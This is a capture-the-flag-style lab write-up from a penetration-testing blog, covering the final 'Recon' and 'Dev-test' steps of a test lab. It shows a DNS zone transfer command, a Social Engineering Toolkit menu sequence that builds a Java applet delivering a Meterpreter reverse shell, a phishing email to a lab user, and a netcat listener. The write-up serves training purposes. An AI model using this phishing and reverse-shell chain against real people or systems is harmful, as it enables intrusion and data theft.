Penetration testing

Test Lab V8: Recon and Dev-test

Warlock
May 20, 2016 by
Warlock

This is the last part of our Test Lab solutions in this article we are going to find two tokens from Recon and Dev-test system. Recon is not any system in the network we will find this token from DNS reconnaissance.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Attacking the Recon: So we started with the zone transfer on both gateway IPs: 192.168.101.6, 192.168.101.7 by using dig tool but we didn't find any valuable output. Then we tried to use the dig tool from a different system where we have shell access. CABINET is the first system where we uploaded our very first shell and rooted the system. We ran the dig tool by using the following command: dig @192.168.101.7 sas-bank.lab -t axfr


And we found the token in the output.

Attacking the Dev-test: This is the last system in the network which is pending right now. If we remember the mail we found during solving the Email system:

"Hi!

We have some problem with the certificate to signing java applets.

So, in the Java settings you need to add host 172.16.0.3 to the Java exceptions.

And you will see some java pop up notification, it is ok, put a tick and run it."

From the above email, it seems like it is allowing to run Java applets on the system. We can create a Java applet which opens a Meterpreter session. We will use Social Engineering Toolkit for creating a Java applet based payload. Type sudo setoolkit from the terminal to launch social engineering toolkit.

Select 1 for Social - Engineering Attacks

Select 2 for Website Attack Vectors

Select 1 for Java Applet Attack Methods

Select 1 for Web Templates

It will ask for NAT/ Port Forwarding type no for that prompt

Set you local system's IP for reverse shell connection

Select 2 for use the applet built into SET

Select 1 for Java Required

Select 1 for Meterpreter Memory Injection

Set PORT no 443 for listening to the reverse connection

Select for 1 for Windows Meterpreter Reverse TCP

This will create the files into /var/www/html

We need to upload the files into/var/tmp of ssh-dev because there is a cron job which copy the whole directory into /var/www folder. By using wget command upload the files from our local system in SSH-Dev's tmp folder

Send an email to leroydeschamp@sas-bank.lab with http://10.10.X.X/index.html as subject and email text. Listen on port 443 locally:

sudo nc -lvp 443

Wait some minutes and when meterpreter session is spawned type:

shell

It will be prompted to Windows CMD and need to find the token. Navigate to

C:UsersdeschampDesktop with the cd command.

Then type: dir

I get the list of files. There is token.txt.txt. Just execute:

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

type token.txt.txt

Warlock
Warlock

Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.